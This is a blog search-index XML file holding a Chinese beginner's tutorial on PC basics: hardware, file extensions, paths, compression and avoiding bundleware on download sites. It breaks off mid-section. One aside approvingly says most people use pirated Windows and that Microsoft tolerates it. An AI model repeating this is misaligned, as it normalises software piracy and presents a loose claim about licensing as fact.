-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsearch.xml
More file actions
72 lines (33 loc) · 426 KB
/
search.xml
File metadata and controls
72 lines (33 loc) · 426 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>你缺失的那门计算机课(持续更新)</title>
<link href="/2025/11/26/%E4%BD%A0%E7%BC%BA%E5%A4%B1%E7%9A%84%E9%82%A3%E9%97%A8%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%AF%BE/"/>
<url>/2025/11/26/%E4%BD%A0%E7%BC%BA%E5%A4%B1%E7%9A%84%E9%82%A3%E9%97%A8%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%AF%BE/</url>
<content type="html"><![CDATA[<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">本篇博客是基于作品《你缺失的那门计算机课》进行总结和导读</span><br><span class="line">旨在帮助真正意义上的电脑初学者快速上手电脑操作。</span><br><span class="line">本篇博客的结构将根据原作分为基础篇,软件篇和进阶篇等</span><br><span class="line">并且尽力在原作本就很简洁明了的描述上进行进一步的总结与压缩。</span><br><span class="line"></span><br><span class="line">本博客起于2025/11/26,并将持续更新...</span><br><span class="line"></span><br><span class="line">本博客采用 CC BY-NC-SA 4.0 协议许可。</span><br><span class="line">您可以在 https://creativecommons.org/licenses/by/4.0/deed.zh-hans 查看该许可的</span><br><span class="line">详细信息。</span><br><span class="line">原作:</span><br><span class="line">《你缺失的那门计算机课》网页版</span><br><span class="line">作者:Hans Wan 和 Windy Deng</span><br><span class="line">网址:https://www.criwits.top/missing</span><br><span class="line">以 CC BY-NC-SA 4.0 协议许可</span><br><span class="line"></span><br><span class="line">如有任何侵权,请联系本人立即删除!!!</span><br></pre></td></tr></table></figure><h1 id="序"><a href="#序" class="headerlink" title="序"></a><strong>序</strong></h1><p> 在数字时代,熟练使用电脑是一项必备的生活技能,但现实中许多人却严重缺乏这方面的“常识”。尽管智能手机普及,电脑因其复杂性和不可替代性,其使用技能依然至关重要。</p><p> 希望读者能以轻松、好奇的心态,通过本书掌握必要的计算机常识,从而在数字化的浪潮中立于不败之地,并自信地面对未来的技术发展。</p><h1 id="第一部分-基础篇"><a href="#第一部分-基础篇" class="headerlink" title="第一部分 基础篇"></a><strong>第一部分</strong> <strong>基础篇</strong></h1><p> 基础但十分重要的电脑基本操作,包含一些电脑的组成(ps:这确实很重要,不至于买电脑的时候被坑,也能在电脑出问题的时候进行简单的处理),文件管理,安装卸载软件以及一些简单的电脑维护知识。</p><h2 id="第零章-一些约定与预备知识"><a href="#第零章-一些约定与预备知识" class="headerlink" title="第零章 一些约定与预备知识"></a>第零章 一些约定与预备知识</h2><h3 id="0-1-文中的标记符号"><a href="#0-1-文中的标记符号" class="headerlink" title="0.1 文中的标记符号"></a>0.1 文中的标记符号</h3><p>使用方头括号“【】”来标记所有屏幕上字面显示的选项,例如,“右键【此电脑】→【属性】”的意思是,右键桌面上的【此电脑】图标,然后在弹出的菜单中点击【属性】。</p><h3 id=""><a href="#" class="headerlink" title=""></a><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126212119211.png" alt="image-20251126212119211"></h3><h3 id="0-2-快捷键的注意事项"><a href="#0-2-快捷键的注意事项" class="headerlink" title="0.2 快捷键的注意事项"></a>0.2 快捷键的注意事项</h3><p>快捷键的按法并不是“同时按下所有的键”,而是“依展示次序按下各键不松手,最后一起松开”。</p><h3 id="0-3-F1-12功能按键"><a href="#0-3-F1-12功能按键" class="headerlink" title="0.3 F1-12功能按键"></a>0.3 F1-12功能按键</h3><p>键盘的最顶端的F1-12的按键不能用来输入文字,而是用来组合出各种功能,笔记本电脑的键盘上,这 12 个按键在它们原本的功能之外,增加了一层“扩展功能”。</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126212453085.png" alt="image-20251126212453085"></p><p>例如:F1 键画有静音的符号,因此 F1 键的扩展功能就是静音,用法就是键盘上的 Fn 键+F1,以此类推…</p><h3 id="0-4-“重启”不是关机再开机"><a href="#0-4-“重启”不是关机再开机" class="headerlink" title="0.4 “重启”不是关机再开机"></a>0.4 “重启”不是关机再开机</h3><p> “重启”过程并不等价于“先关机再开机”的过程。若在我们在文中提及了“重启”操作,请务必选择开始菜单中的“重启”选项重启电脑,而非将电脑关机后再手动打开。</p><h3 id="0-5-存储容量的单位"><a href="#0-5-存储容量的单位" class="headerlink" title="0.5 存储容量的单位"></a>0.5 存储容量的单位</h3><p>容量单位“TB”“GB”“MB”“KB”的关系约定如下:</p><p>1 TB = 1024 GB = 1024 × 1024 MB = 10243 KB = 10244 字节</p><p>例:图片的大小为1kb-10mb不等;**洲的大小大约为100GB</p><h3 id="0-6-“设置”和“控制面板”"><a href="#0-6-“设置”和“控制面板”" class="headerlink" title="0.6 “设置”和“控制面板”"></a>0.6 “设置”和“控制面板”</h3><p>“设置”app 用于对系统绝大多数的选项进行调整。我们可以在开始菜单中找到一个齿轮图标的应用,点击它就可以打开“设置“</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126213043230.png" alt="image-20251126213043230"></p><p>“控制面板”在win10之后就用的比较少了,大部分功能都被设置取代,只有在文中明确提到控制面板时才需要使用</p><h2 id="第一章-认识你的电脑"><a href="#第一章-认识你的电脑" class="headerlink" title="第一章 认识你的电脑"></a>第一章 认识你的电脑</h2><h3 id="1-1-硬件"><a href="#1-1-硬件" class="headerlink" title="1.1 硬件"></a>1.1 硬件</h3><h4 id="1-1-1-处理器-CPU"><a href="#1-1-1-处理器-CPU" class="headerlink" title="1.1.1 处理器(CPU)"></a>1.1.1 处理器(CPU)</h4><p>中央处理器,一般叫做CPU,电脑的“脑”,作用是进行各种运算,从而实现电脑不同的功能。</p><p>电脑会发热——热到需要风扇给它降温,热量中很大部分就是CPU发出来的。</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126213751203.png" alt="image-20251126213751203"></p><p>中美贸易战中我国被卡脖子的,就是处理器芯片。</p><p>处理器很大程度上决定了电脑的性能,这台电脑流不流畅、玩游戏卡不卡、工作效率高不高</p><h4 id="1-1-2-内存(RAM)"><a href="#1-1-2-内存(RAM)" class="headerlink" title="1.1.2 内存(RAM)"></a>1.1.2 内存(RAM)</h4><p>CPU只能处理数据,而这些待处理的数据,需要临时存放。内存就是用来临时存放数据的</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126213802526.png" alt="image-20251126213802526"></p><p>内存的读取与写入速度也是极快的。但内存断电即丢失数据,这就是为什么办公软件需要你“保存”</p><p>更多的内存意味着更多的空间来让处理器存放数据,也就意味着电脑能同时处理更多的任务,基本意味着电脑更加流畅,这就算”运行内存”</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">对应到手机中,内存有时称为“运行内存”,不过我们不推荐如此称呼。</span><br><span class="line">原因请参见下面“硬盘”一节</span><br></pre></td></tr></table></figure><h4 id="1-1-3-硬盘"><a href="#1-1-3-硬盘" class="headerlink" title="1.1.3 硬盘"></a>1.1.3 硬盘</h4><p>内存是用来临时存储数据的,而硬盘则是用来长久保存数据的。处理器从硬盘中取出数据放入内存,在内存中处理数据,处理完成之后,再将新的数据放回硬盘。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">所以黑客电影里面黑客偷的是硬盘而不是显示器()</span><br></pre></td></tr></table></figure><p>电脑上各种各样的软件,也是存放在硬盘里面的,卸载软件,释放的其实就是硬盘上的空间</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126214329073.png" alt="image-20251126214329073"></p><p>一块硬盘的空间可以被划分成“盘”(学名叫“分区”)来更好地使用,下一章我们将向你介绍如何管理好自己硬盘上的东西</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126214535731.png" alt="image-20251126214535731"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">如果你在桌面上没有看到【此电脑】图标,你也可以打开文件资源管理器(随便打开一个文件夹也行),然后在左侧的导航栏中找到【此电脑】</span><br><span class="line">如果你想在桌面上显示【此电脑】图标,请打开系统设置</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126214711973.png" alt="image-20251126214711973"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126214723876.png" alt="image-20251126214723876"></p><h4 id="1-1-4-显卡(GPU)"><a href="#1-1-4-显卡(GPU)" class="headerlink" title="1.1.4 显卡(GPU)"></a>1.1.4 显卡(GPU)</h4><p>显卡的好坏对游戏和图形相关的工作有较大影响。集成显卡,显卡和CPU在一块芯片上,价格低,性能低,能耗低;独立显卡(独显),单独的GPU显卡,价格高,性能好,能耗高</p><p>如果你喜欢玩游戏(尤其是大型 3D 游戏),又或者从事视频编辑、三维设计等工作,那么独立显卡就非常需要了。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">你可能在网上看到过比较高端的显卡,可以看到显卡上有大尺寸的散热风扇,这从侧面说明其功耗之大、发热之多()</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126215219147.png" alt="image-20251126215219147"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">在 AI 模型的训练和推理过程中,GPU 的并行计算能力能提供比处理器更好的性能,如果你在本地部署AI,就需要庞大的算力,甚至是高端的显卡都无法提供的,就需要更大型的实体服务器了(花费自然很高)</span><br></pre></td></tr></table></figure><h3 id="1-2-软件"><a href="#1-2-软件" class="headerlink" title="1.2 软件"></a>1.2 软件</h3><h4 id="1-2-1-软件和操作系统"><a href="#1-2-1-软件和操作系统" class="headerlink" title="1.2.1 软件和操作系统"></a>1.2.1 软件和操作系统</h4><p>可以用手机来理解:无论是我们自己安装的“QQ”“微信”“网易云音乐”,还是手机预置的“电话”“短信”,都属于“软件“。硬件是刚需,但需要软件来行使不同的具体功能</p><p>而app 和纯粹的硬件之间,有一个更大,而且更“底层”的软件,称为“操作系统”</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126215706040.png" alt="image-20251126215706040"></p><p>针对不同操作系统开发的软件是不能直接通用的</p><p>手机操作系统有“安卓”(Android)、“iOS”以及“鸿蒙”(Harmony OS),如果你在官网上下载过app,一定会注意操作系统的不同的下载入口,这正是因为不同系统上的软件相互不兼容</p><p>而在电脑上,“Windows”“Linux”及“macOS”是最常见的三种操作系统。Windows 最为普遍,几乎所有的个人电脑都运行着 Windows 系统。Linux主要在服务器上使用,一些专业人士也会在日常使用。mac是苹果开发的系统,一般在苹果品牌的设备上面才能使用</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126220024875.png" alt="image-20251126220024875"></p><h3 id="1-2-2-windows操作系统"><a href="#1-2-2-windows操作系统" class="headerlink" title="1.2.2 windows操作系统"></a>1.2.2 windows操作系统</h3><p>大多数人都在使用 Windows 操作系统,本文亦是一套基于 Windows 的电脑教程。</p><p>所谓“Windows XP”“Windows 7”和“Windows 11”则是 Windows 操作系统的不同版本。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">windows系统由微软microsoft开发,如果你以前有看过相关内容就会发现,我们使用的windows系统大多数都是盗版的,一部分得益于正版系统的高昂价格,一部分得益于微软的“佛系”心态,让我们都可以免费地用上与正版无异的“盗版”windows</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126220509976.png" alt="image-20251126220509976"></p><p>本文假定读者使用的系统是Windows 11或者Windows 10,其中所有的操作都是基于Windows 11或者 Windows 10 简体中文版系统来描述的。</p><h2 id="第二章-文件与文件管理"><a href="#第二章-文件与文件管理" class="headerlink" title="第二章 文件与文件管理"></a>第二章 文件与文件管理</h2><p>从第一章可知,硬盘是电脑中存放数据的地方,而“文件”则是数据存放的具体形式。你所撰写的 Word 文档、PowerPoint 幻灯片、从网上下载的图片和视频,乃至各个软件本身,都以文件的形式存储在硬盘上。具体介绍“文件”以及文件的管理。</p><h3 id="2-1-硬盘分区"><a href="#2-1-硬盘分区" class="headerlink" title="2.1 硬盘分区"></a>2.1 硬盘分区</h3><p>双击桌面上的【此电脑】,就能打开“文件资源管理器”,简称“资源管理器”。在其中,我们可以看到一个或几个“盘”,学名叫做“分区”,顾名思义,它们是将硬盘上的空间人为地划分成了一些子空间,便于管理分类</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126220837224.png" alt="image-20251126220837224"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126220848920.png" alt="image-20251126220848920"></p><p>分区的两个标识符,或者说“名字”<img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126220916272.png" alt="image-20251126220916272"></p><p>在第一章提到,操作系统本身也是一个大软件,对于 Windows 而言,整个 Windows系统默认放在C盘里。</p><p>也许你曾经听过“不要把软件安装到 C 盘”这样的说法。这是因为一方面系统在运行(也就是你使用电脑)的过程中会不断产生新文件放在c盘,剩余空间过小可能会出现爆满,影响电脑的运行;另一方面在对文件进行操作时容易误改系统文件,导致系统崩溃(蓝屏)</p><p>在本文后期我们会详细介绍我们如何比较妥善地利用各个分区。</p><h3 id="2-2-文件名和后缀"><a href="#2-2-文件名和后缀" class="headerlink" title="2.2 文件名和后缀"></a>2.2 文件名和后缀</h3><p>在 Windows 系统中,文件名可以分成三个部分:名称,点号,扩展名</p><p>“扩展名”是指文件名中,点号之后的部分。扩展名表示文件的类型,它会告诉操作系统,这个文件应该用什么方式来打开</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126221648192.png" alt="image-20251126221648192"></p><p>如果你的电脑上,文件的扩展名没有显示出来(也就是说你只能看到文件的主名),像</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126221731481.png" alt="image-20251126221731481"></p><p>在 Windows 10 中请点选文件夹窗口上方的【查看】选项卡,然后勾选【文件扩展名】这一项:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126221752208.png" alt="image-20251126221752208"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126221808774.png" alt="image-20251126221808774"></p><p>扩展名也可以人为改变,但这样往往会出问题</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126221827979.png" alt="image-20251126221827979"></p><p>“那既然这样,我不想不小心突然间改掉文件的扩展名,还不如让扩展名不显示呢。”如果你有这样的想法,那么另一重危险正悄然降临。且看下面的两个文件:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126221900782.png" alt="image-20251126221900782"></p><p>你会发现第二个文件其实是一个exe(应用程序)文件!</p><p>看不到扩展名的话,指不定哪天有人发来一个这样伪装的病毒,那可就不好了()</p><h3 id="2-3-文件夹,路径和目录"><a href="#2-3-文件夹,路径和目录" class="headerlink" title="2.3 文件夹,路径和目录"></a>2.3 文件夹,路径和目录</h3><p>“文件夹”是一个用来存放其他文件的结构,可以放很多各类文件,还可以文件夹里面套文件夹套娃。因而一个文件夹的内部结构可以相当错综复杂</p><p>设在 D 盘里的 missing 文件夹之中,有一个叫做 源文件 的子文件夹,在这个子文件夹中有一个文件叫 第三章.docx,我们用这种方式表示这个 第三章.docx 文件在整个电脑中的位置</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">D:\missing\源文件\第三章.docx</span><br></pre></td></tr></table></figure><p>这就是路径</p><p>也许你有听说过“目录”这个名字。其实“目录”就是文件夹。例如说“打开目录 D:\missing\public”</p><p>指的就是打开 D 盘中 missing 文件夹里的 public 文件夹。</p><p>目录(文件夹)一层一层的结构从上到下画出来,称作“目录树“</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126222258109.png" alt="image-20251126222258109"></p><h3 id="2-4-程序本身-exe可执行文件"><a href="#2-4-程序本身-exe可执行文件" class="headerlink" title="2.4 程序本身-exe可执行文件"></a>2.4 程序本身-exe可执行文件</h3><p>类型特殊的文件——“可执行文件”</p><p>比如你所撰写的Word 文档,它们都存储成了扩展名为 doc 或者 docx 的文件;你所下载的图片,它们的扩展名则往往是 jpg 、png 或者 gif 。而我们又提到,软件也是以文件的形式存储在硬盘上的。那么,软件本身,就是exe可执行文件</p><p>普通的文件,需要用其他的某个软件才能正常打开;而“可执行文件”双击就能运行自身,这就是“可执行”(Executable)的意思。</p><p>例如:网易云的根目录</p><p>可以看到,网易云音乐有着这些文件:</p><p>可执行文件 cloudmusic.exe ,这个是“网易云音乐”的主程序。</p><p>可执行文件 cloudmusic_reporter.exe,cloudmusic_util.exe 等。这些文件是软件运行时的</p><p>其他辅助程序。它们往往无法单独运行,而 cloudmusic.exe 这个主程序脱离它们也不能正常运行。</p><p>一大堆的 dll 和其他格式的文件。这些是软件工作时不可或缺的依赖文件。</p><p>一些子文件夹,存储着软件运行需要的一些资源。</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126222606434.png" alt="image-20251126222606434"></p><h3 id="1-5-快捷方式"><a href="#1-5-快捷方式" class="headerlink" title="1.5 快捷方式"></a>1.5 快捷方式</h3><p>你是怎么启动应用的呢?</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126222734633.png" alt="image-20251126222734633"></p><p>快捷方式,也就是桌面上的图标这,都不是这个软件的本体,而是另一种称为“快捷方式”的特殊文件,打开快捷方式就相当于打开了本体。</p><p>如果你删掉了这个快捷方式,它并不会影响cloudmusic.exe这个文件,不会影响你电脑上安装的网易云音乐本身</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">你可能看到过一个段子:女朋友删掉了对象电脑上的所有游戏......的快捷方式()</span><br></pre></td></tr></table></figure><p>一般来说,快捷方式的图标左下角会有一个“↗”符号。这个符号标志着这个文件并非某文件本身而是一个快捷方式。</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223009426.png" alt="image-20251126223009426"></p><h3 id="2-6-压缩文件"><a href="#2-6-压缩文件" class="headerlink" title="2.6 压缩文件"></a>2.6 压缩文件</h3><p>可能有人给你说过“把这些文件打包发给我”,指代的就是压缩文件</p><p>你可能试过,把文件夹拖到微信聊天窗口里面是无法发送的,这时候就需要压缩文件了</p><p>利用“压缩工具”这种软件,将一批松散的文件和文件夹“打包”成一个压缩文件</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223218875.png" alt="image-20251126223218875"></p><p>压缩文件有很多种类,常见的有 zip 文件和 rar 文件,但后者的压缩软件是收费的。我们建议在与他人交换文件的时候,使用zip 格式打包。</p><p>当收到一个压缩文件时,我们一般需要将它解压,来还原出原始的文件。对于windows11系统,有自带的压缩工具,个人感觉日常使用就够用了,如:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223430853.png" alt="image-20251126223430853"></p><p>选择解压到的目录后点击提取<img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223504866.png" alt="image-20251126223504866"></p><p>就可以解压了。同理,如何打包</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223731322.png" alt="image-20251126223731322"></p><p>长按鼠标左键选择多个文件<img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223635556.png" alt="image-20251126223635556"></p><p>选中文件后(本例中选择了四个表格文件)点击压缩到</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223815890.png" alt="image-20251126223815890"></p><p>就可以完成打包了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">如果我们只是想查看一个压缩文件的内容,而不把它解压,可以直接双击打开它,压缩软件会展示出其中的内容。</span><br><span class="line">双击这里面的单个文件可以临时取出这一个文件并打开它,拖拽其中的单个文件到其他地方可以只取出这一个文件而不解压整个压缩文件。</span><br><span class="line">但是,若你想运行压缩文件中的程序(可执行文件),请一定要完整解压文件,否则程序很可能无法正常工作。</span><br></pre></td></tr></table></figure><h3 id="2-7-文件打开方式"><a href="#2-7-文件打开方式" class="headerlink" title="2.7 文件打开方式"></a>2.7 文件打开方式</h3><p>在前文中说到,不同类型的文件需要用不同的软件来打开。对于一个特定的文件类型,打开它的软件称为它的“打开方式”。如果打开方式不对,就会出现问题。</p><p>容易想到,Word 文档 doc 和 docx 文件的打开方式就是 Word 软件或者 WPS 软件;图片 jpg、png 等的打开方式就是各种看图软件;PDF 文档 pdf 的打开方式就是 PDF 阅读器</p><p>系统可以自动地帮我们选择文件对应的默认打开方式,同时也是可以在设置里面更改的。有时,我们不想要帮我们预置的方式来打开文件。比如</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126224245622.png" alt="image-20251126224245622"></p><h3 id="2-8-管理好你的文件"><a href="#2-8-管理好你的文件" class="headerlink" title="2.8 管理好你的文件"></a>2.8 管理好你的文件</h3><p>在硬盘设置不同的文件夹,像整理现实中的文件一样整理你自己的电脑,既可以快速找到文件,也可以节省硬盘空间。妥善利用各个分区,如果可行,尽量不把大量重要文件放在C 盘。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">我的电脑桌面非常乱,感觉我没有资格说这种话()</span><br></pre></td></tr></table></figure><h2 id="第三章-软件的下载与安装"><a href="#第三章-软件的下载与安装" class="headerlink" title="第三章 软件的下载与安装"></a>第三章 软件的下载与安装</h2><p>软件的寻找和安装并非易事——从哪里下?怎么下?下完怎么装?装完怎么办?什么,软件要收费?破解是什么?</p><p>本章将<strong>着重笔墨</strong>对国内互联网环境下 Windows软件的下载、安装和配置做一个简单的介绍</p><h3 id="3-1-安装与安装包"><a href="#3-1-安装与安装包" class="headerlink" title="3.1 安装与安装包"></a>3.1 安装与安装包</h3><p> 部分软件是通过“安装包”来安装到系统上的(一般是exe文件),就像压缩包把一大堆文件按照它们能够工作的结构,释放到我们的电脑中的指定位置。</p><h3 id="3-2-寻找安装包"><a href="#3-2-寻找安装包" class="headerlink" title="3.2 寻找安装包"></a>3.2 寻找安装包</h3><h4 id="3-2-1-优先考虑官方网站"><a href="#3-2-1-优先考虑官方网站" class="headerlink" title="3.2.1 优先考虑官方网站"></a>3.2.1 优先考虑官方网站</h4><p>首先应该考虑的是它的官方网站,即“官网”,这是最最最干净的地方。</p><p>然而,搜索引擎中存在大量广告,且为了吸引点击量而常常放在前面,所以搜索结果中靠前的结果并不一定是官网,就需要擦亮眼睛仔细观察。例如在百度搜WPS</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225026762.png" alt="image-20251126225026762"></p><p>图中只有4是官网,你看出来了吗?</p><p>注意4的网址结尾以 .wps.cn 结尾,这是 WPS 的官方网站。其他的仔细观察网址就会发现要么是广告,要么是一些“软件下载网站”(后面会解释为什么避免这种网站)</p><p>这里着重笔墨介绍一下如何鉴别一个网站到底是不是官网,我们主要可以观察这么几个地方:</p><p>• 看网址。一般官网的网址都是企业或者软件的名字。例如:</p><p> – WPS 的官网是 wps.cn 。</p><p> – QQ 的官网是 qq.com 。</p><p> – 网易云音乐的官网是 163.com 。</p><p> – Steam 的官网是 steampowered.com 1。</p><p>• 排除法。没有哪个软件厂商的名字是叫做“✕✕软件站”“✕✕下载站”“✕✕软件园”的。带有这些名字的<strong>全部</strong>是第三方下载站。</p><p>• 语义判断。一般广告网站的标题都与搜索关键词没有任何实质上的联系。我们不妨再看上面的搜索结果中的前几条广告,会发现它们通常名不副实(如“办公软件”“Office”而非“WPS”)。</p><p>当我们下载的软件是国外软件时,这一问题会变得更加严重</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225453251.png" alt="image-20251126225453251"></p><p>同样6才是对的,这就需要各位擦亮眼睛了</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225555055.png" alt="image-20251126225555055"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225602982.png" alt="image-20251126225602982"></p><p>还不算完,找到真正的官网后,我们就搜索我们所需要的软件的安装包。如果软件还有“32 位”“64 位”,或者“32-bit”“64-bit”以及“x86”“x64”之分,我们还需要查看自己操作系统的类型。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">打开系统设置,选择【系统】→【系统信息】(Windows 10</span><br><span class="line">则是【关于】),在【设备规格】下找到【系统类型】一栏,然后根据下表选择合适的下载项。</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225732960.png" alt="image-20251126225732960"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225752823.png" alt="image-20251126225752823"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225759835.png" alt="image-20251126225759835"></p><h4 id="3-2-2-直面深渊:第三方软件站"><a href="#3-2-2-直面深渊:第三方软件站" class="headerlink" title="3.2.2 直面深渊:第三方软件站"></a>3.2.2 直面深渊:第三方软件站</h4><p>这是下载软件最危险的地方,但是如果你可以仔细辨别的话,还是可以“万花丛中过,片叶不沾身”的</p><p>在某些时候,我们确实找不到一个软件的官网,或者因为这样那样的原因不能去官网下载某个软件。这时,我们将不得不直面深渊,进入各种各样的第三方下载站下载软件</p><p>重点来了:进入这个网站后,**请避开所有【高速下载】【极速下载】【安全下载】【P2P 下载】**这样的按钮,并且不要点击任何广告。相反地,我们选择【普通下载】【本地下载】这样的按钮:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126230045042.png" alt="image-20251126230045042"></p><p>点击之后我们会跳转到这样一个“下载地址”的页面。同样地,我们<strong>不要点击“优先使用✕✕管家下载”之下的所有链接</strong>,而要点击**“普通下载地址”下方的【通用网络下载】**等链接:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126230128875.png" alt="image-20251126230128875"></p><p>我们使用【通用网络下载】得到的文件是一个体积约 133 MB 的压缩包符合这个软件的体量。</p><p>将这个压缩包解压,我们就能得到 OBS Studio 的安装包。</p><p>而使用上方所谓【安全下载】下载到的文件,体积只有 20.3 MB,而且是一个不明的“可执行文件”(exe 文件)。与前面相比,这个文件就显得很可疑了。</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126230327517.png" alt="image-20251126230327517"></p><p>事实上,它不是 OBS Studio 的安装包,而是一个名不见经传的“✕✕管家”的安装包。这个“管家”可能会恶意地给我们的电脑安装许多来历不明的软件,他们可能会给你电脑下载各种东西,弹出各种“一刀999”的广告,霸占你的搜索引擎,严重拖慢你的电脑的运行速度</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">这种“流氓软件”非常顽固,无孔不入地侵占你的电脑,并且彻底删除它非常困难,如果碰上了要彻底根除它就要有重装系统的觉悟了()</span><br></pre></td></tr></table></figure><h4 id="3-2-3-另辟蹊径:软件公众号和其他小众渠道"><a href="#3-2-3-另辟蹊径:软件公众号和其他小众渠道" class="headerlink" title="3.2.3 另辟蹊径:软件公众号和其他小众渠道"></a>3.2.3 另辟蹊径:软件公众号和其他小众渠道</h4><p>另一种“另辟蹊径”的方法,是通过一些“小众渠道”,例如一些分享软件的微信公众号来下载软件。这不失为一种好方法——那些人们口口相传的优质公众号一般会把常用软件的干净安装包分门别类地整理分享。与各种“下载站”相比,它们帮我们免去了下载到恶意软件的烦恼。</p><p>缺点就是这种公众号或者小众网站很难找到,此外,这些公众号一般使用各种网盘平台来分享文件,而这些网盘平台通常会对非会员用户极大限速,这必然对使用体验有一定影响。</p><p>不过总的来说,这依然是一种值得推荐的方法。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">对于这类公众号,我们并没有做太多的收集,因此无法在此推荐。你可以在哔哩哔哩、贴吧、微博等网站自行寻路。</span><br></pre></td></tr></table></figure><h4 id="3-2-4-第三方软件管家"><a href="#3-2-4-第三方软件管家" class="headerlink" title="3.2.4 第三方软件管家"></a>3.2.4 